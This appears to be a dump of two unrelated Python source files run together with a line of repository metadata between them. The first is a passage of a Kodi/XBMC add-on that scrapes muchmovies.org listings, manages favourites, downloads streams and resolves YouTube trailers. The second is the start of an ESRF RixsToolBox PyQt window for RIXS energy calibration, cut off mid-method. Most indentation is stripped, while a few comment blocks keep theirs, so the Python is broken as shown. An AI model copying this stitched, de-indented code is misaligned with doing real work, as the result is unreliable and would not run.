file = xbmcvfs.File(favData)
favRead = file.read()
file.close()
total = len(movieList)
for i in movieList:
try:
name, url, image, title, year, imdb, genre, plot = i['name'], i['url'], i['image'], i['title'], i['year'], i['imdb'], i['genre'], i['plot']
if plot == '': plot = addonDesc
if genre == '': genre = ' '
sysname, sysurl, sysimage, systitle, sysimdb = urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(image), urllib.quote_plus(title), urllib.quote_plus(imdb)
u = '%s?action=play&name=%s&url=%s&t=%s' % (sys.argv[0], sysname, sysurl, datetime.datetime.now().strftime("%Y%m%d%H%M%S%f"))
if getSetting("meta") == 'true':
meta = metaget.get_meta('movie', title ,year=year)
playcountMenu = language(30407).encode("utf-8")
if meta['overlay'] == 6: playcountMenu = language(30408).encode("utf-8")
metaimdb = urllib.quote_plus(re.sub("[^0-9]", "", meta['imdb_id']))
trailer, poster = urllib.quote_plus(meta['trailer_url']), meta['cover_url']
if trailer == '': trailer = sysurl
if poster == '': poster = image
else:
meta = {'label': title, 'title': title, 'year': year, 'imdb_id' : imdb, 'genre' : genre, 'plot': plot}
trailer, poster = sysurl, image
if getSetting("meta") == 'true' and getSetting("fanart") == 'true':
fanart = meta['backdrop_url']
if fanart == '': fanart = addonFanart
else:
fanart = addonFanart
cm = []
cm.append((language(30405).encode("utf-8"), 'RunPlugin(%s?action=item_queue)' % (sys.argv[0])))
cm.append((language(30406).encode("utf-8"), 'RunPlugin(%s?action=download&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
cm.append((language(30412).encode("utf-8"), 'Action(Info)'))
if action == 'movies_favourites':
if not getSetting("fav_sort") == '2': cm.append((language(30416).encode("utf-8"), 'RunPlugin(%s?action=trailer&name=%s&url=%s)' % (sys.argv[0], sysname, trailer)))
if getSetting("meta") == 'true': cm.append((language(30415).encode("utf-8"), 'RunPlugin(%s?action=metadata_movies&name=%s&url=%s&imdb=%s)' % (sys.argv[0], systitle, sysurl, metaimdb)))
if getSetting("meta") == 'true': cm.append((playcountMenu, 'RunPlugin(%s?action=playcount_movies&imdb=%s)' % (sys.argv[0], metaimdb)))
cm.append((language(30422).encode("utf-8"), 'RunPlugin(%s?action=library&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
cm.append((language(30428).encode("utf-8"), 'RunPlugin(%s?action=view_movies)' % (sys.argv[0])))
if getSetting("fav_sort") == '2': cm.append((language(30419).encode("utf-8"), 'RunPlugin(%s?action=favourite_moveUp&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
if getSetting("fav_sort") == '2': cm.append((language(30420).encode("utf-8"), 'RunPlugin(%s?action=favourite_moveDown&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
cm.append((language(30421).encode("utf-8"), 'RunPlugin(%s?action=favourite_delete&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
elif action == 'movies_search':
cm.append((language(30416).encode("utf-8"), 'RunPlugin(%s?action=trailer&name=%s&url=%s)' % (sys.argv[0], sysname, trailer)))
cm.append((language(30422).encode("utf-8"), 'RunPlugin(%s?action=library&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
cm.append((language(30417).encode("utf-8"), 'RunPlugin(%s?action=favourite_from_search&name=%s&imdb=%s&url=%s&image=%s)' % (sys.argv[0], sysname, sysimdb, sysurl, sysimage)))
cm.append((language(30428).encode("utf-8"), 'RunPlugin(%s?action=view_movies)' % (sys.argv[0])))
cm.append((language(30409).encode("utf-8"), 'RunPlugin(%s?action=settings_open)' % (sys.argv[0])))
cm.append((language(30410).encode("utf-8"), 'RunPlugin(%s?action=playlist_open)' % (sys.argv[0])))
cm.append((language(30411).encode("utf-8"), 'RunPlugin(%s?action=addon_home)' % (sys.argv[0])))
else:
cm.append((language(30416).encode("utf-8"), 'RunPlugin(%s?action=trailer&name=%s&url=%s)' % (sys.argv[0], sysname, trailer)))
if getSetting("meta") == 'true': cm.append((language(30415).encode("utf-8"), 'RunPlugin(%s?action=metadata_movies2&name=%s&url=%s&imdb=%s)' % (sys.argv[0], systitle, sysurl, metaimdb)))
cm.append((language(30422).encode("utf-8"), 'RunPlugin(%s?action=library&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
if not '"%s"' % url in favRead: cm.append((language(30417).encode("utf-8"), 'RunPlugin(%s?action=favourite_add&name=%s&imdb=%s&url=%s&image=%s)' % (sys.argv[0], sysname, sysimdb, sysurl, sysimage)))
else: cm.append((language(30418).encode("utf-8"), 'RunPlugin(%s?action=favourite_delete&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
cm.append((language(30428).encode("utf-8"), 'RunPlugin(%s?action=view_movies)' % (sys.argv[0])))
cm.append((language(30410).encode("utf-8"), 'RunPlugin(%s?action=playlist_open)' % (sys.argv[0])))
cm.append((language(30411).encode("utf-8"), 'RunPlugin(%s?action=addon_home)' % (sys.argv[0])))
item = xbmcgui.ListItem(name, iconImage="DefaultVideo.png", thumbnailImage=poster)
item.setInfo( type="Video", infoLabels = meta )
item.setProperty("IsPlayable", "true")
item.setProperty("Video", "true")
item.setProperty("art(poster)", poster)
item.setProperty("Fanart_Image", fanart)
item.addContextMenuItems(cm, replaceItems=True)
xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,totalItems=total,isFolder=False)
except:
pass
class contextMenu:
def item_play(self):
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
xbmc.executebuiltin('Action(Queue)')
playlist.unshuffle()
xbmc.Player().play(playlist)
def item_random_play(self):
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
xbmc.executebuiltin('Action(Queue)')
playlist.shuffle()
xbmc.Player().play(playlist)
def item_queue(self):
xbmc.executebuiltin('Action(Queue)')
def playlist_open(self):
xbmc.executebuiltin('ActivateWindow(VideoPlaylist)')
def settings_open(self):
xbmc.executebuiltin('Addon.OpenSettings(%s)' % (addonId))
def addon_home(self):
xbmc.executebuiltin('Container.Update(plugin://%s/,replace)' % (addonId))
def view(self, content):
try:
skin = xbmc.getSkinDir()
if xbmcvfs.exists(xbmc.translatePath('special://xbmc/addons/%s/addon.xml' % (skin))):
xml = xbmc.translatePath('special://xbmc/addons/%s/addon.xml' % (skin))
elif xbmcvfs.exists(xbmc.translatePath('special://home/addons/%s/addon.xml' % (skin))):
xml = xbmc.translatePath('special://home/addons/%s/addon.xml' % (skin))
else:
return
file = xbmcvfs.File(xml)
read = file.read().replace('\n','')
file.close()
src = os.path.dirname(xml) + '/'
try:
src += re.compile('defaultresolution="(.+?)"').findall(read)[0] + '/'
except:
src += re.compile('<res.+?folder="(.+?)"').findall(read)[0] + '/'
src += 'MyVideoNav.xml'
file = xbmcvfs.File(src)
read = file.read().replace('\n','')
file.close()
views = re.compile('<views>(.+?)</views>').findall(read)[0]
views = [int(x) for x in views.split(',')]
for view in views:
label = xbmc.getInfoLabel('Control.GetLabel(%s)' % (view))
if not (label == '' or label is None): break
file = xbmcvfs.File(viewData)
read = file.read()
file.close()
file = open(viewData, 'w')
for line in re.compile('(".+?\n)').findall(read):
if not line.startswith('"%s"|"%s"|"' % (skin, content)): file.write(line)
file.write('"%s"|"%s"|"%s"\n' % (skin, content, str(view)))
file.close()
viewName = xbmc.getInfoLabel('Container.Viewmode')
index().infoDialog('%s%s%s' % (language(30301).encode("utf-8"), viewName, language(30302).encode("utf-8")))
except:
return
def favourite_add(self, data, name, url, image, imdb):
try:
index().container_refresh()
file = open(data, 'a+')
file.write('"%s"|"%s"|"%s"\n' % (name, url, image))
file.close()
index().infoDialog(language(30303).encode("utf-8"), name)
except:
return
def favourite_from_search(self, data, name, url, image, imdb):
try:
file = xbmcvfs.File(data)
read = file.read()
file.close()
if url in read:
index().infoDialog(language(30307).encode("utf-8"), name)
return
file = open(data, 'a+')
file.write('"%s"|"%s"|"%s"\n' % (name, url, image))
file.close()
index().infoDialog(language(30303).encode("utf-8"), name)
except:
return
def favourite_delete(self, data, name, url):
try:
index().container_refresh()
file = xbmcvfs.File(data)
read = file.read()
file.close()
line = [x for x in re.compile('(".+?)\n').findall(read) if '"%s"' % url in x][0]
list = re.compile('(".+?\n)').findall(read.replace(line, ''))
file = open(data, 'w')
for line in list: file.write(line)
file.close()
index().infoDialog(language(30304).encode("utf-8"), name)
except:
return
def favourite_moveUp(self, data, name, url):
try:
index().container_refresh()
file = xbmcvfs.File(data)
read = file.read()
file.close()
list = re.compile('(".+?)\n').findall(read)
line = [x for x in re.compile('(".+?)\n').findall(read) if '"%s"' % url in x][0]
i = list.index(line)
if i == 0 : return
list[i], list[i-1] = list[i-1], list[i]
file = open(data, 'w')
for line in list: file.write('%s\n' % (line))
file.close()
index().infoDialog(language(30305).encode("utf-8"), name)
except:
return
def favourite_moveDown(self, data, name, url):
try:
index().container_refresh()
file = xbmcvfs.File(data)
read = file.read()
file.close()
list = re.compile('(".+?)\n').findall(read)
line = [x for x in re.compile('(".+?)\n').findall(read) if '"%s"' % url in x][0]
i = list.index(line)
if i+1 == len(list): return
list[i], list[i+1] = list[i+1], list[i]
file = open(data, 'w')
for line in list: file.write('%s\n' % (line))
file.close()
index().infoDialog(language(30306).encode("utf-8"), name)
except:
return
def metadata(self, content, name, url, imdb, season, episode):
try:
if content == 'movie' or content == 'tvshow':
metaget.update_meta(content, '', imdb, year='')
index().container_refresh()
            elif content == 'season':
                metaget.update_season('', imdb, season)
                index().container_refresh()
            elif content == 'episode':
                metaget.update_episode_meta('', imdb, season, episode)
                index().container_refresh()
except:
return
def playcount(self, content, imdb, season, episode):
try:
metaget.change_watched(content, '', imdb, season=season, episode=episode, year='', watched='')
index().container_refresh()
except:
return
def library(self, name, url, silent=False):
try:
library = xbmc.translatePath(getSetting("movie_library"))
sysname, sysurl = urllib.quote_plus(name), urllib.quote_plus(url)
content = '%s?action=play&name=%s&url=%s' % (sys.argv[0], sysname, sysurl)
enc_name = name.translate(None, '\/:*?"<>|')
folder = os.path.join(library, enc_name)
stream = os.path.join(folder, enc_name + '.strm')
xbmcvfs.mkdir(dataPath)
xbmcvfs.mkdir(library)
xbmcvfs.mkdir(folder)
file = xbmcvfs.File(stream, 'w')
file.write(content)
file.close()
if silent == False:
index().infoDialog(language(30311).encode("utf-8"), name)
except:
return
def download(self, name, url):
try:
property = (addonName+name)+'download'
download = xbmc.translatePath(getSetting("downloads"))
enc_name = name.translate(None, '\/:*?"<>|')
xbmcvfs.mkdir(dataPath)
xbmcvfs.mkdir(download)
file = [i for i in xbmcvfs.listdir(download)[1] if i.startswith(enc_name + '.')]
if not file == []: file = os.path.join(download, file[0])
else: file = None
if download == '':
yes = index().yesnoDialog(language(30341).encode("utf-8"), language(30342).encode("utf-8"))
if yes: contextMenu().settings_open()
return
if file is None:
pass
elif not file.endswith('.tmp'):
yes = index().yesnoDialog(language(30343).encode("utf-8"), language(30344).encode("utf-8"), name)
if yes:
xbmcvfs.delete(file)
else:
return
elif file.endswith('.tmp'):
if index().getProperty(property) == 'open':
yes = index().yesnoDialog(language(30345).encode("utf-8"), language(30346).encode("utf-8"), name)
if yes: index().setProperty(property, 'cancel')
return
else:
xbmcvfs.delete(file)
url = resolver().run(url, name, download=True)
if url is None: return
ext = url.rsplit('/', 1)[-1].rsplit('?', 1)[0].rsplit('|', 1)[0].strip().lower()
ext = os.path.splitext(ext)[1][1:]
stream = os.path.join(download, enc_name + '.' + ext)
temp = stream + '.tmp'
count = 0
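            # download the response in 16 KiB chunks so progress can be
            # reported and the transfer can be cancelled between reads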
CHUNK = 16 * 1024
request = urllib2.Request(url)
request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7')
request.add_header('Cookie', 'video=true') #add cookie
response = urllib2.urlopen(request, timeout=10)
size = response.info()["Content-Length"]
file = xbmcvfs.File(temp, 'w')
index().setProperty(property, 'open')
index().infoDialog(language(30308).encode("utf-8"), name)
while True:
chunk = response.read(CHUNK)
if not chunk: break
if index().getProperty(property) == 'cancel': raise Exception()
if xbmc.abortRequested == True: raise Exception()
part = xbmcvfs.File(temp)
quota = int(100 * float(part.size())/float(size))
part.close()
if not count == quota and count in [0,10,20,30,40,50,60,70,80,90]:
index().infoDialog(language(30309).encode("utf-8") + str(count) + '%', name)
file.write(chunk)
count = quota
response.close()
file.close()
index().clearProperty(property)
xbmcvfs.rename(temp, stream)
index().infoDialog(language(30310).encode("utf-8"), name)
        except:
            # cleanup must not assume the transfer ever started: 'file' may
            # still hold the directory listing and 'temp' may be undefined
            try: file.close()
            except: pass
            index().clearProperty(property)
            try: xbmcvfs.delete(temp)
            except: pass
            sys.exit()
            return
def trailer(self, name, url):
url = resolver().trailer(name, url)
if url is None: return
item = xbmcgui.ListItem(path=url)
item.setProperty("IsPlayable", "true")
xbmc.Player(xbmc.PLAYER_CORE_AUTO).play(url, item)
class favourites:
def __init__(self):
self.list = []
def movies(self):
file = xbmcvfs.File(favData)
read = file.read()
file.close()
match = re.compile('"(.+?)"[|]"(.+?)"[|]"(.+?)"').findall(read)
for name, url, image in match:
try: year = re.compile('[(](\d{4})[)]').findall(name)[-1]
except: year = '0'
title = name.replace('(%s)' % year, '').strip()
self.list.append({'name': name, 'url': url, 'image': image, 'title': title, 'year': year, 'imdb': '0', 'genre': '', 'plot': ''})
if getSetting("fav_sort") == '0':
self.list = sorted(self.list, key=itemgetter('title'))
elif getSetting("fav_sort") == '1':
self.list = sorted(self.list, key=itemgetter('title'))[::-1]
self.list = sorted(self.list, key=itemgetter('year'))[::-1]
index().movieList(self.list)
class root:
def get(self):
rootList = []
rootList.append({'name': 30501, 'image': 'Title.png', 'action': 'movies_title'})
rootList.append({'name': 30502, 'image': 'Release.png', 'action': 'movies_release'})
rootList.append({'name': 30503, 'image': 'Added.png', 'action': 'movies_added'})
rootList.append({'name': 30504, 'image': 'Rating.png', 'action': 'movies_rating'})
rootList.append({'name': 30505, 'image': 'Pages.png', 'action': 'pages_movies'})
rootList.append({'name': 30506, 'image': 'Genres.png', 'action': 'genres_movies'})
rootList.append({'name': 30507, 'image': 'Favourites.png', 'action': 'movies_favourites'})
rootList.append({'name': 30508, 'image': 'Search.png', 'action': 'movies_search'})
index().rootList(rootList)
index().downloadList()
class link:
def __init__(self):
self.muchmovies_base = 'http://www.muchmovies.org'
self.muchmovies_sort = 'http://www.muchmovies.org/session/sort'
self.muchmovies_title = 'http://www.muchmovies.org/movies?sort_by=title'
self.muchmovies_release = 'http://www.muchmovies.org/movies?sort_by=release'
self.muchmovies_added = 'http://www.muchmovies.org/movies?sort_by=date_added'
self.muchmovies_rating = 'http://www.muchmovies.org/movies?sort_by=rating'
self.muchmovies_root = 'http://www.muchmovies.org/movies'
self.muchmovies_search = 'http://www.muchmovies.org/search'
self.muchmovies_genre = 'http://www.muchmovies.org/genres'
self.youtube_base = 'http://www.youtube.com'
self.youtube_search = 'http://gdata.youtube.com/feeds/api/videos?q='
self.youtube_watch = 'http://www.youtube.com/watch?v=%s'
self.youtube_info = 'http://gdata.youtube.com/feeds/api/videos/%s?v=2'
class pages:
def __init__(self):
self.list = []
def muchmovies(self):
self.list = self.muchmovies_list()
index().pageList(self.list)
def muchmovies_list(self):
try:
result = getUrl(link().muchmovies_root, mobile=True).result
pages = common.parseDOM(result, "div", attrs = { "class": "pagenav" })[0]
pages = re.compile('(<option.+?</option>)').findall(pages)
except:
return
for page in pages:
try:
name = common.parseDOM(page, "option")[0]
name = common.replaceHTMLCodes(name)
name = name.encode('utf-8')
url = common.parseDOM(page, "option", ret="value")[0]
url = '%s%s?sort_by=title' % (link().muchmovies_base, url)
url = common.replaceHTMLCodes(url)
url = url.encode('utf-8')
image = addonPages.encode('utf-8')
self.list.append({'name': name, 'url': url, 'image': image})
except:
pass
return self.list
class genres:
def __init__(self):
self.list = []
def muchmovies(self):
self.list = self.muchmovies_list()
index().pageList(self.list)
def muchmovies_list(self):
try:
result = getUrl(link().muchmovies_genre, mobile=True).result
genres = common.parseDOM(result, "ul", attrs = { "id": "genres" })
genres = common.parseDOM(genres, "li")
except:
return
for genre in genres:
try:
name = common.parseDOM(genre, "h2")[0]
name = common.replaceHTMLCodes(name)
name = name.encode('utf-8')
url = common.parseDOM(genre, "a", ret="href")[0]
url = '%s%s?sort_by=release' % (link().muchmovies_base, url)
url = common.replaceHTMLCodes(url)
url = url.encode('utf-8')
image = common.parseDOM(genre, "img", ret="src")[0]
image = '%s%s' % (link().muchmovies_base, image)
image = common.replaceHTMLCodes(image)
image = image.encode('utf-8')
self.list.append({'name': name, 'url': url, 'image': image})
except:
pass
return self.list
class movies:
def __init__(self):
self.list = []
self.data = []
def muchmovies(self, url):
self.list = self.muchmovies_list(url)
index().movieList(self.list)
index().nextList(self.list)
def muchmovies_title(self):
self.list = self.muchmovies_list(link().muchmovies_title)
index().movieList(self.list)
index().nextList(self.list)
def muchmovies_release(self):
self.list = self.muchmovies_list(link().muchmovies_release)
index().movieList(self.list)
index().nextList(self.list)
def muchmovies_added(self):
self.list = self.muchmovies_list(link().muchmovies_added)
index().movieList(self.list)
index().nextList(self.list)
def muchmovies_rating(self):
self.list = self.muchmovies_list(link().muchmovies_rating)
index().movieList(self.list)
index().nextList(self.list)
def muchmovies_search(self, query=None):
if query is None:
self.query = common.getUserInput(language(30362).encode("utf-8"), '')
else:
self.query = query
if not (self.query is None or self.query == ''):
self.query = link().muchmovies_search + '/' + urllib.quote_plus(self.query.replace(' ', '-'))
self.list = self.muchmovies_list(self.query)
index().movieList(self.list)
index().nextList(self.list)
def muchmovies_list(self, url):
try:
post = url.split('?')[-1]
result = getUrl(link().muchmovies_sort, post=post, mobile=True, close=False, cookie=True).result
result = getUrl(url, mobile=True).result
movies = common.parseDOM(result, "li", attrs = { "data-icon": "false" })
except:
return
try:
try:
next = common.parseDOM(result, "a", ret="href", attrs = { "data-icon": "arrow-r", "class": "ui-disabled" })[0]
next = ''
except:
next = common.parseDOM(result, "a", ret="href", attrs = { "data-icon": "arrow-r" })[0]
next = '%s%s?%s' % (link().muchmovies_base, next, post)
except:
next = ''
for movie in movies:
try:
name = common.parseDOM(movie, "h2")[0]
name = common.replaceHTMLCodes(name)
name = name.encode('utf-8')
match = re.findall('(.+?)[(](\d{4})[)]', name)[0]
title = match[0].strip()
title = common.replaceHTMLCodes(title)
title = title.encode('utf-8')
year = match[-1].strip()
year = re.sub("[^0-9]", "", year)
year = year.encode('utf-8')
url = common.parseDOM(movie, "a", ret="href")[0]
url = '%s%s' % (link().muchmovies_base, url)
url = common.replaceHTMLCodes(url)
url = url.encode('utf-8')
image = common.parseDOM(movie, "img", ret="src")[0]
image = common.replaceHTMLCodes(image)
image = image.encode('utf-8')
self.list.append({'name': name, 'url': url, 'image': image, 'title': title, 'year': year, 'imdb': '0', 'genre': '', 'plot': '', 'next': next})
except:
pass
return self.list
class resolver:
def run(self, url, name=None, download=False):
try:
if player().status() is True: return
url = self.muchmovies(url)
if url is None: raise Exception()
if download == True: return url
player().run(name, url)
return url
except:
index().infoDialog(language(30318).encode("utf-8"))
return
def muchmovies(self, url):
try:
result = getUrl(url, mobile=True).result
url = common.parseDOM(result, "a", ret="href")
url = [i for i in url if "?action=stream" in i][0]
url = url.split("?")[0]
return url
except:
return
def trailer(self, name, url):
try:
if not url.startswith('http://'):
url = link().youtube_watch % url
url = self.youtube(url)
else:
try:
result = getUrl(url).result
url = re.compile('"http://www.youtube.com/embed/(.+?)"').findall(result)[0]
if ' ' in url: raise Exception()
url = url.split("?")[0].split("&")[0]
url = link().youtube_watch % url
url = self.youtube(url)
except:
url = link().youtube_search + name + ' trailer'
url = self.youtube_search(url)
if url is None: return
return url
except:
return
def youtube_search(self, url):
try:
if index().addon_status('plugin.video.youtube') is None:
index().okDialog(language(30321).encode("utf-8"), language(30322).encode("utf-8"))
return
query = url.split("?q=")[-1].split("/")[-1].split("?")[0]
url = url.replace(query, urllib.quote_plus(query))
result = getUrl(url).result
result = common.parseDOM(result, "entry")
result = common.parseDOM(result, "id")
for url in result[:5]:
url = url.split("/")[-1]
url = link().youtube_watch % url
url = self.youtube(url)
if not url is None: return url
except:
return
def youtube(self, url):
try:
if index().addon_status('plugin.video.youtube') is None:
index().okDialog(language(30321).encode("utf-8"), language(30322).encode("utf-8"))
return
id = url.split("?v=")[-1].split("/")[-1].split("?")[0].split("&")[0]
state, reason = None, None
result = getUrl(link().youtube_info % id).result
try:
state = common.parseDOM(result, "yt:state", ret="name")[0]
reason = common.parseDOM(result, "yt:state", ret="reasonCode")[0]
except:
pass
if state == 'deleted' or state == 'rejected' or state == 'failed' or reason == 'requesterRegion' : return
try:
result = getUrl(link().youtube_watch % id).result
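                # a notification area on the watch page means the video is
                # blocked, so bail out; if parseDOM finds nothing, the [0]
                # lookup raises IndexError and control falls through to pass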
alert = common.parseDOM(result, "div", attrs = { "id": "watch7-notification-area" })[0]
return
except:
pass
url = 'plugin://plugin.video.youtube/?action=play_video&videoid=%s' % id
return url
except:
return
main() | gpl-2.0 | -4,796,895,218,968,150,000 | 45.186472 | 868 | 0.534018 | false |
kkummer/RixsToolBox | RTB_EnergyCalibration.py | 1 | 21352 | #!/usr/bin/env python
#-*- coding: utf-8 -*-
#/*##########################################################################
# Copyright (C) 2016 K. Kummer, A. Tamborino, European Synchrotron Radiation
# Facility
#
# This file is part of the ID32 RIXSToolBox developed at the ESRF by the ID32
# staff and the ESRF Software group.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#############################################################################*/
from __future__ import division
__author__ = "K. Kummer - ESRF ID32"
__contact__ = "[email protected]"
__license__ = "MIT"
__copyright__ = "European Synchrotron Radiation Facility, Grenoble, France"
___doc__ = """
...
"""
import os
import copy
import time
import numpy as np
from PyMca5.PyMcaGui import PyMcaQt as qt
from PyMca5.PyMcaGui.pymca import ScanWindow
from PyMca5.PyMcaCore.SpecFileDataSource import SpecFileDataSource
from PyMca5.PyMcaGui.pymca import QDispatcher
from PyMca5.PyMcaGui.pymca.SumRulesTool import MarkerSpinBox
from RTB_SpecGen import ExportWidget
from RTB_Icons import RtbIcons
class MainWindow(qt.QWidget):
def __init__(self, parent=None):
DEBUG = 1
qt.QWidget.__init__(self, parent)
self.setWindowTitle('RixsToolBox - Energy conversion')
self.setWindowIcon(qt.QIcon(qt.QPixmap(RtbIcons['Logo'])))
self.build()
self.connect_signals()
self.scansCalibrated = False
def build(self):
self._sourceWidget = QDispatcher.QDispatcher(self)
fileTypeList = ['Spec Files (*.spec)',
'Dat Files (*.dat)',
'All Files (*.*)']
self._sourceWidget.sourceSelector.fileTypeList = fileTypeList
for tabnum in range(self._sourceWidget.tabWidget.count()):
if self._sourceWidget.tabWidget.tabText(tabnum) != 'SpecFile':
self._sourceWidget.tabWidget.removeTab(tabnum)
self._sourceWidget.selectorWidget['SpecFile']
self._exportWidget = ExportWidget()
self._plotSpectraWindow = ScanWindow.ScanWindow(
parent=self,
backend=None,
plugins=False, # Hide plugin tool button
roi=False, # No ROI widget
control=True, # Hide option button
position=True, # Show x,y position display
info=True,
)
#~ self._plotSpectraWindow.graph.enablemarkermode()
calibrationWidget = qt.QGroupBox()
calibrationWidget.setTitle('Parameters')
calibrationLayout = qt.QHBoxLayout()
self._ecalibSpinBox = qt.QDoubleSpinBox()
self._ecalibSpinBox.setMaximumWidth(100)
self._ecalibSpinBox.setMinimumWidth(70)
self._ecalibSpinBox.setAlignment(qt.Qt.AlignRight)
self._ecalibSpinBox.setMinimum(-1000000)
self._ecalibSpinBox.setMaximum(1000000)
self._ecalibSpinBox.setDecimals(2)
self._ecalibSpinBox.setSingleStep(1)
self._ecalibSpinBox.setValue(50)
ecalibLayout = qt.QHBoxLayout()
ecalibLayout.addWidget(qt.QLabel('meV / px'))
ecalibLayout.addWidget(qt.HorizontalSpacer())
ecalibLayout.addWidget(self._ecalibSpinBox)
ecalibWidget = qt.QWidget()
ecalibWidget.setLayout(ecalibLayout)
self._ezeroSpinBox = MarkerSpinBox(self, self._plotSpectraWindow, r'$E=0$')
self._ezeroSpinBox.setMaximumWidth(100)
self._ezeroSpinBox.setMinimumWidth(70)
self._ezeroSpinBox.setAlignment(qt.Qt.AlignRight)
self._ezeroSpinBox.setMinimum(-100000)
self._ezeroSpinBox.setMaximum(100000)
self._ezeroSpinBox.setDecimals(3)
self._ezeroSpinBox.setSingleStep(1)
self._ezeroSpinBox.setValue(0)
ezeroLayout = qt.QHBoxLayout()
ezeroLayout.addWidget(qt.QLabel('zero energy pixel'))
ezeroLayout.addWidget(qt.HorizontalSpacer())
ezeroLayout.addWidget(self._ezeroSpinBox)
ezeroWidget = qt.QWidget()
ezeroWidget.setLayout(ezeroLayout)
self._markersPositioned = False
calibrationLayout.addWidget(ecalibWidget)
calibrationLayout.addWidget(ezeroWidget)
calibrationWidget.setLayout(calibrationLayout)
self.showGaussianCheckBox = qt.QCheckBox('Show Gaussian at zero energy')
self.GaussianWidthSpinBox = qt.QDoubleSpinBox()
self.GaussianWidthSpinBox.setMaximumWidth(100)
self.GaussianWidthSpinBox.setMinimumWidth(70)
self.GaussianWidthSpinBox.setAlignment(qt.Qt.AlignRight)
self.GaussianWidthSpinBox.setMinimum(0.001)
self.GaussianWidthSpinBox.setMaximum(10000000)
self.GaussianWidthSpinBox.setDecimals(3)
self.GaussianWidthSpinBox.setSingleStep(1)
self.GaussianWidthSpinBox.setValue(1)
self.GaussianWidthSpinBox.setEnabled(False)
GaussianWidthLayout = qt.QHBoxLayout()
GaussianWidthLayout.addWidget(qt.QLabel('FWHM'))
GaussianWidthLayout.addSpacing(10)
GaussianWidthLayout.addWidget(self.GaussianWidthSpinBox)
gaussianWidthWidget = qt.QWidget()
gaussianWidthWidget.setLayout(GaussianWidthLayout)
self.GaussianHeightSpinBox = qt.QDoubleSpinBox()
self.GaussianHeightSpinBox.setMaximumWidth(100)
self.GaussianHeightSpinBox.setMinimumWidth(70)
self.GaussianHeightSpinBox.setAlignment(qt.Qt.AlignRight)
self.GaussianHeightSpinBox.setMinimum(0.001)
self.GaussianHeightSpinBox.setMaximum(10000000)
self.GaussianHeightSpinBox.setDecimals(3)
self.GaussianHeightSpinBox.setSingleStep(1)
self.GaussianHeightSpinBox.setValue(5)
self.GaussianHeightSpinBox.setEnabled(False)
GaussianHeightLayout = qt.QHBoxLayout()
GaussianHeightLayout.addWidget(qt.QLabel('height'))
GaussianHeightLayout.addSpacing(10)
GaussianHeightLayout.addWidget(self.GaussianHeightSpinBox)
gaussianHeightWidget = qt.QWidget()
gaussianHeightWidget.setLayout(GaussianHeightLayout)
self.GaussianHeightSpinBox.setDisabled(True)
self.autoscaleGaussianCheckBox = qt.QCheckBox('Autoscale height')
self.autoscaleGaussianCheckBox.setChecked(True)
gaussianLayout = qt.QGridLayout()
gaussianLayout.addWidget(self.showGaussianCheckBox, 0, 0, 1, 2)
gaussianLayout.addWidget(gaussianWidthWidget, 1, 0, 1, 1)
gaussianLayout.addWidget(gaussianHeightWidget, 1, 2, 1, 1)
gaussianLayout.addWidget(self.autoscaleGaussianCheckBox, 1, 3, 1, 1)
gaussianWidget = qt.QWidget()
gaussianWidget.setLayout(gaussianLayout)
self.calibrateButton = qt.QPushButton('Convert')
self.calibrateButton.setMinimumSize(75,75)
self.calibrateButton.setMaximumSize(75,75)
self.calibrateButton.clicked.connect(self.calibrateButtonClicked)
self.saveButton = qt.QPushButton('Save')
self.saveButton.setMinimumSize(75,75)
self.saveButton.setMaximumSize(75,75)
self.saveButton.clicked.connect(self.saveButtonClicked)
self.saveButton.setDisabled(True)
self.saveButton.setToolTip('Select output file\nto enable saving')
self._inputLayout = qt.QHBoxLayout(self)
self._inputLayout.addWidget(calibrationWidget)
self._inputLayout.addWidget(gaussianWidget)
self._inputLayout.addWidget(qt.HorizontalSpacer())
self._inputLayout.addWidget(self.calibrateButton)
self._inputLayout.addWidget(self.saveButton)
self._inputWidget = qt.QWidget()
self._inputWidget.setLayout(self._inputLayout)
self._rsLayout = qt.QVBoxLayout(self)
self._rsLayout.addWidget(self._inputWidget)
self._rsLayout.addWidget(self._plotSpectraWindow)
self._rsWidget = qt.QWidget()
self._rsWidget.setContentsMargins(0,0,0,-8)
self._rsWidget.setLayout(self._rsLayout)
self._lsLayout = qt.QVBoxLayout(self)
self._lsLayout.addWidget(self._sourceWidget)
self._lsLayout.addWidget(self._exportWidget)
self._lsWidget = qt.QWidget()
self._lsWidget.setContentsMargins(0,0,0,-8)
self._lsWidget.setSizePolicy(
qt.QSizePolicy(qt.QSizePolicy.Fixed, qt.QSizePolicy.Preferred))
self._lsWidget.setLayout(self._lsLayout)
self._lsWidget.setMaximumWidth(500)
self.splitter = qt.QSplitter(self)
